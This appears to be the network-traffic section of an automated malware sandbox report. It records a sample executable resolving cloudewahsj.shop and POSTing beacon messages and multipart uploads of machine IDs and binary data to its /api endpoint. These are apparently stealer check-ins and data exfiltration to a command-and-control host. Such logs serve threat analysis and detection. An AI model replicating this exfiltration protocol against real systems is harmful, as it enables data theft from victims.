Jan 4, 2025 15:31:56.810219049 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.866385937 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.866399050 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.866602898 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:56.879190922 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.879358053 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:56.879380941 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341542006 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341586113 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341619968 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341640949 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.341656923 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341698885 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341701984 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.341711044 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341758013 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341757059 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.341767073 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.341804028 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.341809988 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.342609882 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.342659950 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.342668056 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.346463919 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.346513033 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.346520901 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.395765066 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.429785967 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.429835081 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.429881096 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.429882050 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.429892063 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.429925919 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.429925919 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.429972887 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.430284977 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.430300951 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.430310011 CET | 49732 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.430315018 CET | 443 | 49732 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.573072910 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.573110104 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:57.573184967 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.573463917 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:57.573481083 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.142371893 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.142436028 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.143863916 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.143872023 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.144067049 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.145457029 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.145598888 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.145620108 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.145678997 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.145685911 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.815172911 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.815248966 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.815304995 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.815572023 CET | 49733 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.815587997 CET | 443 | 49733 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.899379015 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.899410009 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:58.899487019 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.899755955 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:58.899770021 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:59.355365038 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:59.355446100 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:59.460592031 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:59.460622072 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:59.460874081 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:31:59.467216969 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:59.467334986 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:31:59.467367887 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:32:00.388539076 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:32:00.388628006 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:32:00.388680935 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:32:00.388801098 CET | 49734 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:32:00.388819933 CET | 443 | 49734 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:32:00.571597099 CET | 49735 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:32:00.571626902 CET | 443 | 49735 | 104.21.96.1 | 192.168.2.4
Jan 4, 2025 15:32:00.571708918 CET | 49735 | 443 | 192.168.2.4 | 104.21.96.1
Jan 4, 2025 15:32:00.571974993 CET | 49735 | 443 | 192.168.2.4 | 104.21.96.1
                                                                            Jan 4, 2025 15:32:00.571985960 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.043561935 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.043747902 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.044847965 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.044856071 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.045048952 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.046113014 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.046248913 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.046278000 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.046349049 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.046355963 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.682929993 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.683024883 CET44349735104.21.96.1192.168.2.4
                                                                            Jan 4, 2025 15:32:01.683089972 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.683320999 CET49735443192.168.2.4104.21.96.1
                                                                            Jan 4, 2025 15:32:01.683332920 CET44349735104.21.96.1192.168.2.4
Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Jan 4, 2025 15:31:55.180568933 CET  55498        53         192.168.2.4  1.1.1.1
Jan 4, 2025 15:31:55.191967010 CET  53           55498      1.1.1.1      192.168.2.4

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class        DNS over HTTPS
Jan 4, 2025 15:31:55.180568933 CET  192.168.2.4  1.1.1.1  0xb57d    Standard query (0)  cloudewahsj.shop  A (IP address)  IN (0x0001)  false

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address       Type            Class        DNS over HTTPS
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.96.1   A (IP address)  IN (0x0001)  false
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.64.1   A (IP address)  IN (0x0001)  false
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.48.1   A (IP address)  IN (0x0001)  false
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.16.1   A (IP address)  IN (0x0001)  false
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.32.1   A (IP address)  IN (0x0001)  false
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.80.1   A (IP address)  IN (0x0001)  false
Jan 4, 2025 15:31:55.191967010 CET  1.1.1.1    192.168.2.4  0xb57d    No error (0)  cloudewahsj.shop         104.21.112.1  A (IP address)  IN (0x0001)  false
                                                                            • cloudewahsj.shop
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49731        104.21.96.1     443               3916  C:\Users\user\Desktop\rdFy6abQ61.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-04 14:31:55 UTC  263                OUT        POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: cloudewahsj.shop
2025-01-04 14:31:55 UTC  8                  OUT        Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-04 14:31:56 UTC  1123               IN         HTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:31:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=4u2r8t69dchj2mvgg1k4s19k3p; expires=Wed, 30 Apr 2025 08:18:35 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bn%2B8Taz5fN8QnZVsXMV5SBYPjqKF92KzSXiiMcFk3J6dtxtkDZU1CXuqqqOnHwi3DiF%2B4MZfJqpKW4c4b5cVOXO2OjOkPSU1NXOUeTr3Xf9s0lfDwbbE5GmHhp17oehYWf%2BZ"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef5ea8a372a4-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=55585&min_rtt=5895&rtt_var=32137&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=495335&cwnd=212&unsent_bytes=0&cid=69b425d2079a7856&ts=493&x=0"
2025-01-04 14:31:56 UTC  7                  IN         Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-04 14:31:56 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49732        104.21.96.1     443               3916  C:\Users\user\Desktop\rdFy6abQ61.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-04 14:31:56 UTC  264                OUT        POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 74
                                                                            Host: cloudewahsj.shop
2025-01-04 14:31:56 UTC  74                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2025-01-04 14:31:57 UTC  1123               IN         HTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:31:57 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=94trhk48e3lpm4k6jam1djp7cc; expires=Wed, 30 Apr 2025 08:18:36 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZUvk%2FjQvPkSd96vdNRj%2F7LQYi2LkWYw3cIbDKI5Kk8yd1TKoXZznvdxzLuV2PidMNTKciSOP6TpSw9C0T8M1DRXQN%2BnLar%2B39NCKFp6xM6HDfTUssSWUqGOPnArfYavCSWj"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef64dd0c42c0-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1710&rtt_var=643&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=974&delivery_rate=1698662&cwnd=212&unsent_bytes=0&cid=230c3d3a8aa191c1&ts=536&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49733        104.21.96.1     443               3916  C:\Users\user\Desktop\rdFy6abQ61.exe

Timestamp                Bytes transferred  Direction  Data
2025-01-04 14:31:58 UTC  281                OUT        POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=H7RLDH9T1ERKF0YD9
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 18152
                                                                            Host: cloudewahsj.shop
                                                                            Data Ascii: --H7RLDH9T1ERKF0YD9Content-Disposition: form-data; name="hwid"37E0CC8E008D304A822D1F4978021086--H7RLDH9T1ERKF0YD9Content-Disposition: form-data; name="pid"2--H7RLDH9T1ERKF0YD9Content-Disposition: form-data; name="lid"4h5VfH----H7RL
2025-01-04 14:31:58 UTC  1129               IN         HTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:31:58 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=9e3uhneqad9opvhkd96btoo39k; expires=Wed, 30 Apr 2025 08:18:37 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Fb0CakmEko4TJvckgvpAA0Ip%2FYNxhflLRSJtqAjopqt9fg89z5sRORCLaGE8haJQ%2FU5m0MsOUAUDQTr4q6iGesPxCPO%2BZeOkHLtlAtO%2FJxz7gPuMx%2Bf5VisTcczUT6J4BHd"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef6cbc151a48-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2008&rtt_var=777&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2835&recv_bytes=19113&delivery_rate=1385856&cwnd=157&unsent_bytes=0&cid=ade8ca23a6c15368&ts=617&x=0"
                                                                            2025-01-04 14:31:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-04 14:31:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 3
                                                                            Source IP: 192.168.2.4
                                                                            Source Port: 49734
                                                                            Destination IP: 104.21.96.1
                                                                            Destination Port: 443
                                                                            PID: 3916
                                                                            Process: C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2025-01-04 14:31:59 UTC | 281 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=MTFSOTV1TW6P64QDEZ
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8779
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:31:59 UTC | 8779 | OUT | Data Raw: 2d 2d 4d 54 46 53 4f 54 56 31 54 57 36 50 36 34 51 44 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 30 43 43 38 45 30 30 38 44 33 30 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4d 54 46 53 4f 54 56 31 54 57 36 50 36 34 51 44 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 54 46 53 4f 54 56 31 54 57 36 50 36 34 51 44 45 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4d
                                                                            Data Ascii: --MTFSOTV1TW6P64QDEZContent-Disposition: form-data; name="hwid"37E0CC8E008D304A822D1F4978021086--MTFSOTV1TW6P64QDEZContent-Disposition: form-data; name="pid"2--MTFSOTV1TW6P64QDEZContent-Disposition: form-data; name="lid"4h5VfH----M
                                                                            2025-01-04 14:32:00 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:32:00 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=u790ndc48occ8jn55uto2j48v1; expires=Wed, 30 Apr 2025 08:18:39 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BNhhcY9RWsTCM0QdlvF3MyeQI8x6VsOUJ3EPcmRK5mlAMgtHZKdlNRxp%2BhM6sfchQtZtiWUNRpn%2Fenuhknk4i2krLdC%2BtYrWbIRAKgCKxhSx8%2FLwKziRZzxKJPNH%2B2%2F6%2Bmn"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef755edb4363-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1573&rtt_var=603&sent=11&recv=16&lost=0&retrans=0&sent_bytes=2836&recv_bytes=9718&delivery_rate=1793611&cwnd=238&unsent_bytes=0&cid=d682e630bf4895f9&ts=1039&x=0"
                                                                            2025-01-04 14:32:00 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-04 14:32:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID: 4
                                                                            Source IP: 192.168.2.4
                                                                            Source Port: 49735
                                                                            Destination IP: 104.21.96.1
                                                                            Destination Port: 443
                                                                            PID: 3916
                                                                            Process: C:\Users\user\Desktop\rdFy6abQ61.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2025-01-04 14:32:01 UTC | 279 | OUT | POST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=MQVHS5L6YALPSOF
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 20414
                                                                            Host: cloudewahsj.shop
                                                                            2025-01-04 14:32:01 UTC | 15331 | OUT | Data Raw: 2d 2d 4d 51 56 48 53 35 4c 36 59 41 4c 50 53 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 30 43 43 38 45 30 30 38 44 33 30 34 41 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 4d 51 56 48 53 35 4c 36 59 41 4c 50 53 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 51 56 48 53 35 4c 36 59 41 4c 50 53 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 4d 51 56 48 53 35 4c 36 59 41
                                                                            Data Ascii: --MQVHS5L6YALPSOFContent-Disposition: form-data; name="hwid"37E0CC8E008D304A822D1F4978021086--MQVHS5L6YALPSOFContent-Disposition: form-data; name="pid"3--MQVHS5L6YALPSOFContent-Disposition: form-data; name="lid"4h5VfH----MQVHS5L6YA
                                                                            2025-01-04 14:32:01 UTC | 5083 | OUT | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                            2025-01-04 14:32:01 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                            Date: Sat, 04 Jan 2025 14:32:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=87bo8gt9gtk4iudejdfm8i2qh2; expires=Wed, 30 Apr 2025 08:18:40 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9FSHIepbvd42mFe28DohbBlIkKZ2q6K1Fixhl%2BOHoIsjT7dGebD%2BzXHsrRCkhmtbiO2dqcSqqcQjrPUHEbIBE9GC%2BazjDirG5SN%2BdxyZrTioO43E6dixR%2FLuWQALKeHt42Y"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8fcbef7ed9ba72a4-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1919&rtt_var=731&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21373&delivery_rate=1486005&cwnd=212&unsent_bytes=0&cid=dd9a1e7816129f8b&ts=642&x=0"
                                                                            2025-01-04 14:32:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-04 14:32:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0



                                                                            Target ID:0
                                                                            Start time:09:31:53
                                                                            Start date:04/01/2025
